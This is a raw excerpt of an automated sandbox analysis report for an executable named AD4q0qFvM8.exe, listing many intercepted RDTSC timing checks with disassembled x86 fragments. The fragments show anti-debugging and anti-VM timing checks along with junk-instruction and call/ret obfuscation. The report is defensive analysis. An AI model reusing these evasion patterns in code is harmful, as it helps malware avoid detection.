Source: C:\Users\user\Desktop\AD4q0qFvM8.exe RDTSC instruction interceptor: First address: ED2C87 second address: ED2CA2 instructions: 0x00000000 rdtsc 0x00000002 jo 00007FDAC110B286h 0x00000008 pop edx 0x00000009 pop eax 0x0000000a push eax 0x0000000b push edx 0x0000000c jmp 00007FDAC110B28Dh 0x00000011 push edi 0x00000012 pop edi 0x00000013 rdtsc
Source: C:\Users\user\Desktop\AD4q0qFvM8.exe RDTSC instruction interceptor: First address: ED2CA2 second address: ED2CCA instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FDAC0B0C800h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 push eax 0x0000000a push edx 0x0000000b jmp 00007FDAC0B0C802h 0x00000010 rdtsc
Source: C:\Users\user\Desktop\AD4q0qFvM8.exe RDTSC instruction interceptor: First address: ED3107 second address: ED310B instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\AD4q0qFvM8.exe RDTSC instruction interceptor: First address: ED310B second address: ED315E instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FDAC0B0C7FBh 0x00000007 jmp 00007FDAC0B0C809h 0x0000000c pop edx 0x0000000d pop eax 0x0000000e push edi 0x0000000f push esi 0x00000010 pop esi 0x00000011 push ebx 0x00000012 pop ebx 0x00000013 pop edi 0x00000014 jmp 00007FDAC0B0C804h 0x00000019 popad 0x0000001a push eax 0x0000001b push edx 0x0000001c jo 00007FDAC0B0C802h 0x00000022 jnc 00007FDAC0B0C7F6h 0x00000028 push eax 0x00000029 push edx 0x0000002a rdtsc
Source: C:\Users\user\Desktop\AD4q0qFvM8.exe RDTSC instruction interceptor: First address: ED315E second address: ED3162 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\AD4q0qFvM8.exe RDTSC instruction interceptor: First address: ED34A5 second address: ED34B9 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push ecx 0x00000005 pop ecx 0x00000006 pop edi 0x00000007 jmp 00007FDAC0B0C7FDh 0x0000000c rdtsc
Source: C:\Users\user\Desktop\AD4q0qFvM8.exe RDTSC instruction interceptor: First address: ED3629 second address: ED3632 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 push edi 0x00000007 push eax 0x00000008 push edx 0x00000009 rdtsc
Source: C:\Users\user\Desktop\AD4q0qFvM8.exe RDTSC instruction interceptor: First address: ED38FF second address: ED3908 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop ecx 0x00000005 push eax 0x00000006 push edx 0x00000007 push eax 0x00000008 push edx 0x00000009 rdtsc
Source: C:\Users\user\Desktop\AD4q0qFvM8.exe RDTSC instruction interceptor: First address: ED3908 second address: ED3912 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jng 00007FDAC110B286h 0x0000000a rdtsc
Source: C:\Users\user\Desktop\AD4q0qFvM8.exe RDTSC instruction interceptor: First address: EC9629 second address: EC9633 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jl 00007FDAC0B0C7F6h 0x0000000a rdtsc
Source: C:\Users\user\Desktop\AD4q0qFvM8.exe RDTSC instruction interceptor: First address: EC9633 second address: EC9637 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\AD4q0qFvM8.exe RDTSC instruction interceptor: First address: ED46F9 second address: ED4704 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop eax 0x00000005 push eax 0x00000006 push edx 0x00000007 push eax 0x00000008 push edx 0x00000009 push eax 0x0000000a push edx 0x0000000b rdtsc
Source: C:\Users\user\Desktop\AD4q0qFvM8.exe RDTSC instruction interceptor: First address: ED4704 second address: ED4708 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\AD4q0qFvM8.exe RDTSC instruction interceptor: First address: ED4708 second address: ED4732 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 jno 00007FDAC0B0C814h 0x0000000c rdtsc
Source: C:\Users\user\Desktop\AD4q0qFvM8.exe RDTSC instruction interceptor: First address: ED4732 second address: ED4746 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 jmp 00007FDAC110B290h 0x00000009 rdtsc
Source: C:\Users\user\Desktop\AD4q0qFvM8.exe RDTSC instruction interceptor: First address: ED49C9 second address: ED49CD instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\AD4q0qFvM8.exe RDTSC instruction interceptor: First address: ED49CD second address: ED49D1 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\AD4q0qFvM8.exe RDTSC instruction interceptor: First address: ED4D0C second address: ED4D1D instructions: 0x00000000 rdtsc 0x00000002 push ebx 0x00000003 pop ebx 0x00000004 ja 00007FDAC0B0C7F6h 0x0000000a pop edx 0x0000000b pop eax 0x0000000c pushad 0x0000000d push ecx 0x0000000e pop ecx 0x0000000f push eax 0x00000010 push edx 0x00000011 rdtsc
Source: C:\Users\user\Desktop\AD4q0qFvM8.exe RDTSC instruction interceptor: First address: ED4D1D second address: ED4D28 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 popad 0x00000006 push eax 0x00000007 push edx 0x00000008 push edi 0x00000009 push eax 0x0000000a push edx 0x0000000b rdtsc
Source: C:\Users\user\Desktop\AD4q0qFvM8.exe RDTSC instruction interceptor: First address: ED4D28 second address: ED4D4A instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jmp 00007FDAC0B0C809h 0x00000009 pop edi 0x0000000a push eax 0x0000000b push edx 0x0000000c push edx 0x0000000d pop edx 0x0000000e rdtsc
Source: C:\Users\user\Desktop\AD4q0qFvM8.exe RDTSC instruction interceptor: First address: ED4D4A second address: ED4D56 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 jno 00007FDAC110B286h 0x0000000a pop edx 0x0000000b pop eax 0x0000000c rdtsc
Source: C:\Users\user\Desktop\AD4q0qFvM8.exe RDTSC instruction interceptor: First address: ED8C68 second address: ED8C92 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 mov eax, dword ptr [eax] 0x00000007 jmp 00007FDAC0B0C803h 0x0000000c mov dword ptr [esp+04h], eax 0x00000010 push eax 0x00000011 push edx 0x00000012 pushad 0x00000013 pushad 0x00000014 popad 0x00000015 ja 00007FDAC0B0C7F6h 0x0000001b popad 0x0000001c rdtsc
Source: C:\Users\user\Desktop\AD4q0qFvM8.exe RDTSC instruction interceptor: First address: ED8C92 second address: ED8C97 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 push eax 0x00000004 push edx 0x00000005 rdtsc
Source: C:\Users\user\Desktop\AD4q0qFvM8.exe RDTSC instruction interceptor: First address: ED8C97 second address: ED8C9D instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\AD4q0qFvM8.exe RDTSC instruction interceptor: First address: ED8DE0 second address: ED8DE5 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop esi 0x00000005 rdtsc
Source: C:\Users\user\Desktop\AD4q0qFvM8.exe RDTSC instruction interceptor: First address: ED8DE5 second address: ED8DEB instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 push eax 0x00000005 pop eax 0x00000006 rdtsc
Source: C:\Users\user\Desktop\AD4q0qFvM8.exe RDTSC instruction interceptor: First address: ED8DEB second address: ED8E2F instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pop edx 0x00000007 pop eax 0x00000008 push eax 0x00000009 jl 00007FDAC110B29Dh 0x0000000f jmp 00007FDAC110B297h 0x00000014 mov eax, dword ptr [esp+04h] 0x00000018 jmp 00007FDAC110B294h 0x0000001d mov eax, dword ptr [eax] 0x0000001f pushad 0x00000020 push eax 0x00000021 push eax 0x00000022 push edx 0x00000023 rdtsc
Source: C:\Users\user\Desktop\AD4q0qFvM8.exe RDTSC instruction interceptor: First address: ED8E2F second address: ED8E37 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop eax 0x00000005 pushad 0x00000006 push eax 0x00000007 push edx 0x00000008 rdtsc
Source: C:\Users\user\Desktop\AD4q0qFvM8.exe RDTSC instruction interceptor: First address: ED8E37 second address: ED8E58 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pushad 0x00000005 popad 0x00000006 popad 0x00000007 popad 0x00000008 mov dword ptr [esp+04h], eax 0x0000000c push eax 0x0000000d push edx 0x0000000e pushad 0x0000000f jmp 00007FDAC110B28Fh 0x00000014 push eax 0x00000015 pop eax 0x00000016 popad 0x00000017 rdtsc
Source: C:\Users\user\Desktop\AD4q0qFvM8.exe RDTSC instruction interceptor: First address: E9A420 second address: E9A424 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\AD4q0qFvM8.exe RDTSC instruction interceptor: First address: E9A424 second address: E9A436 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pushad 0x00000007 pushad 0x00000008 popad 0x00000009 pushad 0x0000000a popad 0x0000000b jo 00007FDAC110B286h 0x00000011 popad 0x00000012 rdtsc
Source: C:\Users\user\Desktop\AD4q0qFvM8.exe RDTSC instruction interceptor: First address: E9A436 second address: E9A458 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 push ebx 0x00000004 pop ebx 0x00000005 jmp 00007FDAC0B0C807h 0x0000000a pushad 0x0000000b popad 0x0000000c popad 0x0000000d push ecx 0x0000000e push eax 0x0000000f push edx 0x00000010 rdtsc
Source: C:\Users\user\Desktop\AD4q0qFvM8.exe RDTSC instruction interceptor: First address: EDF745 second address: EDF753 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FDAC110B28Ah 0x00000007 pop edx 0x00000008 pop eax 0x00000009 rdtsc
Source: C:\Users\user\Desktop\AD4q0qFvM8.exe RDTSC instruction interceptor: First address: EDFA5A second address: EDFA62 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 pushad 0x00000005 popad 0x00000006 push eax 0x00000007 push edx 0x00000008 rdtsc
Source: C:\Users\user\Desktop\AD4q0qFvM8.exe RDTSC instruction interceptor: First address: EDFA62 second address: EDFA66 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\AD4q0qFvM8.exe RDTSC instruction interceptor: First address: EE0059 second address: EE006D instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FDAC0B0C7FAh 0x00000007 push eax 0x00000008 push edx 0x00000009 jl 00007FDAC0B0C7F6h 0x0000000f rdtsc
Source: C:\Users\user\Desktop\AD4q0qFvM8.exe RDTSC instruction interceptor: First address: EE006D second address: EE0071 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\AD4q0qFvM8.exe RDTSC instruction interceptor: First address: EE1CC3 second address: EE1CC7 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\AD4q0qFvM8.exe RDTSC instruction interceptor: First address: EE1CC7 second address: EE1D0D instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 xor dword ptr [esp], 12E415F2h 0x0000000d push 00000000h 0x0000000f push eax 0x00000010 call 00007FDAC110B288h 0x00000015 pop eax 0x00000016 mov dword ptr [esp+04h], eax 0x0000001a add dword ptr [esp+04h], 0000001Ch 0x00000022 inc eax 0x00000023 push eax 0x00000024 ret 0x00000025 pop eax 0x00000026 ret 0x00000027 mov dword ptr [ebp+124553D7h], edi 0x0000002d push F920948Eh 0x00000032 push eax 0x00000033 push edx 0x00000034 js 00007FDAC110B288h 0x0000003a pushad 0x0000003b popad 0x0000003c rdtsc
Source: C:\Users\user\Desktop\AD4q0qFvM8.exe RDTSC instruction interceptor: First address: EE1F36 second address: EE1F49 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 jmp 00007FDAC0B0C7FFh 0x00000009 rdtsc
Source: C:\Users\user\Desktop\AD4q0qFvM8.exe RDTSC instruction interceptor: First address: EE29CE second address: EE29D2 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\AD4q0qFvM8.exe RDTSC instruction interceptor: First address: EE2ABA second address: EE2ABE instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\AD4q0qFvM8.exe RDTSC instruction interceptor: First address: EE2ABE second address: EE2AD8 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pop ecx 0x00000007 push eax 0x00000008 push eax 0x00000009 push edx 0x0000000a push edi 0x0000000b jmp 00007FDAC110B28Eh 0x00000010 pop edi 0x00000011 rdtsc
Source: C:\Users\user\Desktop\AD4q0qFvM8.exe RDTSC instruction interceptor: First address: EE2AD8 second address: EE2ADE instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 pushad 0x00000005 popad 0x00000006 rdtsc
Source: C:\Users\user\Desktop\AD4q0qFvM8.exe RDTSC instruction interceptor: First address: EE2D76 second address: EE2D7B instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 push eax 0x00000004 push edx 0x00000005 rdtsc
Source: C:\Users\user\Desktop\AD4q0qFvM8.exe RDTSC instruction interceptor: First address: EE3C31 second address: EE3C37 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 pushad 0x00000005 popad 0x00000006 rdtsc
Source: C:\Users\user\Desktop\AD4q0qFvM8.exe RDTSC instruction interceptor: First address: EE59B2 second address: EE59E9 instructions: 0x00000000 rdtsc 0x00000002 push edx 0x00000003 jmp 00007FDAC110B28Fh 0x00000008 pop edx 0x00000009 pop edx 0x0000000a pop eax 0x0000000b push eax 0x0000000c pushad 0x0000000d pushad 0x0000000e push edi 0x0000000f pop edi 0x00000010 jmp 00007FDAC110B294h 0x00000015 popad 0x00000016 push eax 0x00000017 push edx 0x00000018 jc 00007FDAC110B286h 0x0000001e rdtsc
Source: C:\Users\user\Desktop\AD4q0qFvM8.exe RDTSC instruction interceptor: First address: EE59E9 second address: EE5A45 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FDAC0B0C7FBh 0x00000007 pop edx 0x00000008 pop eax 0x00000009 popad 0x0000000a nop 0x0000000b jnc 00007FDAC0B0C7FCh 0x00000011 push 00000000h 0x00000013 mov edi, dword ptr [ebp+122D36DBh] 0x00000019 push 00000000h 0x0000001b push 00000000h 0x0000001d push ebp 0x0000001e call 00007FDAC0B0C7F8h 0x00000023 pop ebp 0x00000024 mov dword ptr [esp+04h], ebp 0x00000028 add dword ptr [esp+04h], 0000001Ah 0x00000030 inc ebp 0x00000031 push ebp 0x00000032 ret 0x00000033 pop ebp 0x00000034 ret 0x00000035 sub dword ptr [ebp+1245873Ah], ebx 0x0000003b xchg eax, ebx 0x0000003c push eax 0x0000003d push edx 0x0000003e jmp 00007FDAC0B0C7FAh 0x00000043 rdtsc
Source: C:\Users\user\Desktop\AD4q0qFvM8.exe RDTSC instruction interceptor: First address: EE5A45 second address: EE5A78 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FDAC110B299h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 push eax 0x0000000a push eax 0x0000000b push edx 0x0000000c jmp 00007FDAC110B293h 0x00000011 rdtsc
Source: C:\Users\user\Desktop\AD4q0qFvM8.exe RDTSC instruction interceptor: First address: EE8541 second address: EE859F instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FDAC0B0C808h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 popad 0x0000000a mov dword ptr [esp], eax 0x0000000d push edx 0x0000000e jl 00007FDAC0B0C7F9h 0x00000014 movsx edi, bx 0x00000017 pop edi 0x00000018 push 00000000h 0x0000001a push 00000000h 0x0000001c push 00000000h 0x0000001e push ebp 0x0000001f call 00007FDAC0B0C7F8h 0x00000024 pop ebp 0x00000025 mov dword ptr [esp+04h], ebp 0x00000029 add dword ptr [esp+04h], 0000001Ah 0x00000031 inc ebp 0x00000032 push ebp 0x00000033 ret 0x00000034 pop ebp 0x00000035 ret 0x00000036 mov si, cx 0x00000039 push eax 0x0000003a push eax 0x0000003b je 00007FDAC0B0C7FCh 0x00000041 push eax 0x00000042 push edx 0x00000043 rdtsc
Source: C:\Users\user\Desktop\AD4q0qFvM8.exe RDTSC instruction interceptor: First address: EE62E0 second address: EE62E5 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 push eax 0x00000004 push edx 0x00000005 rdtsc
Source: C:\Users\user\Desktop\AD4q0qFvM8.exe RDTSC instruction interceptor: First address: EEB276 second address: EEB280 instructions: 0x00000000 rdtsc 0x00000002 jns 00007FDAC0B0C7F6h 0x00000008 pop edx 0x00000009 pop eax 0x0000000a rdtsc
Source: C:\Users\user\Desktop\AD4q0qFvM8.exe RDTSC instruction interceptor: First address: EEB280 second address: EEB2AB instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FDAC110B28Fh 0x00000007 pop edx 0x00000008 pop eax 0x00000009 push eax 0x0000000a pushad 0x0000000b jmp 00007FDAC110B28Dh 0x00000010 pushad 0x00000011 jng 00007FDAC110B286h 0x00000017 push eax 0x00000018 push edx 0x00000019 rdtsc
Source: C:\Users\user\Desktop\AD4q0qFvM8.exe RDTSC instruction interceptor: First address: EEB837 second address: EEB83B instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\AD4q0qFvM8.exe RDTSC instruction interceptor: First address: EEB83B second address: EEB841 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
Source: C:\Users\user\Desktop\AD4q0qFvM8.exe RDTSC instruction interceptor: First address: EEB841 second address: EEB84B instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 jc 00007FDAC0B0C7F6h 0x0000000a rdtsc
Source: C:\Users\user\Desktop\AD4q0qFvM8.exe RDTSC instruction interceptor: First address: EEB84B second address: EEB84F instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\AD4q0qFvM8.exe RDTSC instruction interceptor: First address: EEB84F second address: EEB85C instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pop edx 0x00000007 pop eax 0x00000008 push eax 0x00000009 push eax 0x0000000a push esi 0x0000000b push eax 0x0000000c push edx 0x0000000d rdtsc
Source: C:\Users\user\Desktop\AD4q0qFvM8.exe RDTSC instruction interceptor: First address: EECAA4 second address: EECAA8 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\AD4q0qFvM8.exe RDTSC instruction interceptor: First address: EEDACB second address: EEDAD0 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 push eax 0x00000004 push edx 0x00000005 rdtsc
Source: C:\Users\user\Desktop\AD4q0qFvM8.exe RDTSC instruction interceptor: First address: EEEACD second address: EEEAE9 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FDAC110B298h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 rdtsc
Source: C:\Users\user\Desktop\AD4q0qFvM8.exe RDTSC instruction interceptor: First address: EF0969 second address: EF096D instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\AD4q0qFvM8.exe RDTSC instruction interceptor: First address: EECAA8 second address: EECB37 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pop edi 0x00000007 mov dword ptr [esp], eax 0x0000000a mov dword ptr [ebp+122D2C02h], ebx 0x00000010 push dword ptr fs:[00000000h] 0x00000017 jmp 00007FDAC110B291h 0x0000001c mov dword ptr fs:[00000000h], esp 0x00000023 jc 00007FDAC110B28Ah 0x00000029 push edi 0x0000002a push eax 0x0000002b pop ebx 0x0000002c pop ebx 0x0000002d mov eax, dword ptr [ebp+122D132Dh] 0x00000033 mov dword ptr [ebp+12479B13h], edx 0x00000039 push FFFFFFFFh 0x0000003b push 00000000h 0x0000003d push ecx 0x0000003e call 00007FDAC110B288h 0x00000043 pop ecx 0x00000044 mov dword ptr [esp+04h], ecx 0x00000048 add dword ptr [esp+04h], 00000016h 0x00000050 inc ecx 0x00000051 push ecx 0x00000052 ret 0x00000053 pop ecx 0x00000054 ret 0x00000055 jmp 00007FDAC110B291h 0x0000005a nop 0x0000005b push edi 0x0000005c pushad 0x0000005d jmp 00007FDAC110B294h 0x00000062 push eax 0x00000063 push edx 0x00000064 rdtsc
Source: C:\Users\user\Desktop\AD4q0qFvM8.exe RDTSC instruction interceptor: First address: EF096D second address: EF0971 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\AD4q0qFvM8.exe RDTSC instruction interceptor: First address: EEEAE9 second address: EEEB8A instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FDAC110B299h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 mov dword ptr [esp], eax 0x0000000c xor dword ptr [ebp+122D5926h], ecx 0x00000012 push dword ptr fs:[00000000h] 0x00000019 mov bl, 85h 0x0000001b mov dword ptr fs:[00000000h], esp 0x00000022 push 00000000h 0x00000024 push esi 0x00000025 call 00007FDAC110B288h 0x0000002a pop esi 0x0000002b mov dword ptr [esp+04h], esi 0x0000002f add dword ptr [esp+04h], 0000001Ah 0x00000037 inc esi 0x00000038 push esi 0x00000039 ret 0x0000003a pop esi 0x0000003b ret 0x0000003c movsx ebx, di 0x0000003f mov eax, dword ptr [ebp+122D0795h] 0x00000045 mov ebx, dword ptr [ebp+122D3893h] 0x0000004b push FFFFFFFFh 0x0000004d push 00000000h 0x0000004f push eax 0x00000050 call 00007FDAC110B288h 0x00000055 pop eax 0x00000056 mov dword ptr [esp+04h], eax 0x0000005a add dword ptr [esp+04h], 0000001Ah 0x00000062 inc eax 0x00000063 push eax 0x00000064 ret 0x00000065 pop eax 0x00000066 ret 0x00000067 nop 0x00000068 push eax 0x00000069 push edx 0x0000006a jmp 00007FDAC110B293h 0x0000006f rdtsc
Source: C:\Users\user\Desktop\AD4q0qFvM8.exe RDTSC instruction interceptor: First address: EEEB8A second address: EEEB9F instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FDAC0B0C7FBh 0x00000007 pop edx 0x00000008 pop eax 0x00000009 push eax 0x0000000a push eax 0x0000000b push edx 0x0000000c pushad 0x0000000d push eax 0x0000000e push edx 0x0000000f rdtsc
Source: C:\Users\user\Desktop\AD4q0qFvM8.exe RDTSC instruction interceptor: First address: EEEB9F second address: EEEBA6 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push ebx 0x00000005 pop ebx 0x00000006 popad 0x00000007 rdtsc
Source: C:\Users\user\Desktop\AD4q0qFvM8.exe RDTSC instruction interceptor: First address: EEEBA6 second address: EEEBAC instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 push ecx 0x00000005 pop ecx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\AD4q0qFvM8.exe RDTSC instruction interceptor: First address: EA0D64 second address: EA0D69 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push eax 0x00000004 push edx 0x00000005 rdtsc
Source: C:\Users\user\Desktop\AD4q0qFvM8.exe RDTSC instruction interceptor: First address: EF3FAF second address: EF3FB9 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 jns 00007FDAC0B0C7F6h 0x0000000a rdtsc
Source: C:\Users\user\Desktop\AD4q0qFvM8.exe RDTSC instruction interceptor: First address: EF3FB9 second address: EF4004 instructions: 0x00000000 rdtsc 0x00000002 ja 00007FDAC110B286h 0x00000008 pop edx 0x00000009 pop eax 0x0000000a pop edx 0x0000000b pop eax 0x0000000c mov dword ptr [esp], eax 0x0000000f mov edi, eax 0x00000011 push 00000000h 0x00000013 push 00000000h 0x00000015 push edi 0x00000016 call 00007FDAC110B288h 0x0000001b pop edi 0x0000001c mov dword ptr [esp+04h], edi 0x00000020 add dword ptr [esp+04h], 00000017h 0x00000028 inc edi 0x00000029 push edi 0x0000002a ret 0x0000002b pop edi 0x0000002c ret 0x0000002d clc 0x0000002e xor edi, dword ptr [ebp+122D38D7h] 0x00000034 push 00000000h 0x00000036 sub di, E8A6h 0x0000003b xchg eax, esi 0x0000003c jc 00007FDAC110B294h 0x00000042 push eax 0x00000043 push edx 0x00000044 push ecx 0x00000045 pop ecx 0x00000046 rdtsc
Source: C:\Users\user\Desktop\AD4q0qFvM8.exe RDTSC instruction interceptor: First address: EF4004 second address: EF4013 instructions: 0x00000000 rdtsc 0x00000002 jo 00007FDAC0B0C7F6h 0x00000008 pop edx 0x00000009 pop eax 0x0000000a push eax 0x0000000b push edx 0x0000000c push edi 0x0000000d push eax 0x0000000e push edx 0x0000000f rdtsc
Source: C:\Users\user\Desktop\AD4q0qFvM8.exe RDTSC instruction interceptor: First address: EF4F91 second address: EF4FB6 instructions: 0x00000000 rdtsc 0x00000002 push edx 0x00000003 pop edx 0x00000004 pop edx 0x00000005 pop eax 0x00000006 mov dword ptr [esp], eax 0x00000009 adc bx, AE30h 0x0000000e push 00000000h 0x00000010 mov di, E425h 0x00000014 push 00000000h 0x00000016 or bh, FFFFFFEEh 0x00000019 push eax 0x0000001a jbe 00007FDAC110B290h 0x00000020 pushad 0x00000021 pushad 0x00000022 popad 0x00000023 push eax 0x00000024 push edx 0x00000025 rdtsc
Source: C:\Users\user\Desktop\AD4q0qFvM8.exe RDTSC instruction interceptor: First address: EF412A second address: EF4143 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 jnc 00007FDAC0B0C7F6h 0x00000009 push esi 0x0000000a pop esi 0x0000000b popad 0x0000000c pop edx 0x0000000d pop eax 0x0000000e push eax 0x0000000f push eax 0x00000010 push edx 0x00000011 jno 00007FDAC0B0C7F8h 0x00000017 rdtsc
Source: C:\Users\user\Desktop\AD4q0qFvM8.exe RDTSC instruction interceptor: First address: EF70CC second address: EF70D1 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 push eax 0x00000004 push edx 0x00000005 rdtsc
Source: C:\Users\user\Desktop\AD4q0qFvM8.exe RDTSC instruction interceptor: First address: EF90C2 second address: EF90CB instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 push eax 0x00000006 push edx 0x00000007 pushad 0x00000008 popad 0x00000009 rdtsc
Source: C:\Users\user\Desktop\AD4q0qFvM8.exe RDTSC instruction interceptor: First address: EF736F second address: EF738C instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 jmp 00007FDAC110B298h 0x00000008 push eax 0x00000009 push edx 0x0000000a rdtsc
Source: C:\Users\user\Desktop\AD4q0qFvM8.exe RDTSC instruction interceptor: First address: EFC142 second address: EFC148 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push ecx 0x00000005 pop ecx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\AD4q0qFvM8.exe RDTSC instruction interceptor: First address: EFC148 second address: EFC14C instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\AD4q0qFvM8.exe RDTSC instruction interceptor: First address: EFC14C second address: EFC15A instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 push eax 0x00000007 push edx 0x00000008 jng 00007FDAC0B0C7F6h 0x0000000e rdtsc
Source: C:\Users\user\Desktop\AD4q0qFvM8.exe RDTSC instruction interceptor: First address: EA93AB second address: EA93AF instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
